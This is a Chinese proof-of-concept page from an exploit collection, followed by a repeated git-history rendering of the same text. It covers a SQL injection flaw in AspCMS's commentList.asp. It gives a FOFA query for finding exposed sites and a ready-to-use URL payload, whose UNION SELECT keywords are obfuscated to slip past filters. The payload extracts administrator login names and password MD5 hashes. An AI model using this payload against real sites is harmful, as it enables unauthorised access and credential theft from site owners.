Awesome-POC/CMS漏洞/AspCMS commentList.asp SQL注入漏洞.md

# AspCMS commentList.asp SQL注入漏洞

## 漏洞描述

AspCMS commentList.asp 存在SQL注入漏洞，攻击者通过漏洞可以获取管理员md5的密码

## 漏洞影响

```
AspCMS
```

## 网络测绘

```
app="ASPCMS"
```

## 漏洞复现

通过网站源码响应判断CMS

![img](./images/202202170904613.png)

验证POC

```php
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
```

![img](./images/202202170904678.png)

成功获取管理员账号以及密码的MD5
-												update gitbook

											
										
										
											2022-02-20 16:14:31 +08:00
+								# AspCMS commentList.asp SQL注入漏洞
 								## 漏洞描述
 								AspCMS commentList.asp 存在SQL注入漏洞，攻击者通过漏洞可以获取管理员md5的密码
 								## 漏洞影响
 								```
 								AspCMS
 								```
-												更新漏洞

											
										
										
											2023-08-28 15:55:36 +08:00
+								## 网络测绘
-												update gitbook

											
										
										
											2022-02-20 16:14:31 +08:00
 								```
 								app="ASPCMS"
 								```
 								## 漏洞复现
 								通过网站源码响应判断CMS
-												更新漏洞

											
										
										
											2022-12-05 11:09:28 +08:00
+								![img](./images/202202170904613.png)
-												update gitbook

											
										
										
											2022-02-20 16:14:31 +08:00
 								验证POC
 								```php
 								/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
 								```
-												更新漏洞

											
										
										
											2022-12-05 11:09:28 +08:00
+								![img](./images/202202170904678.png)
-												update gitbook

											
										
										
											2022-02-20 16:14:31 +08:00
 								成功获取管理员账号以及密码的MD5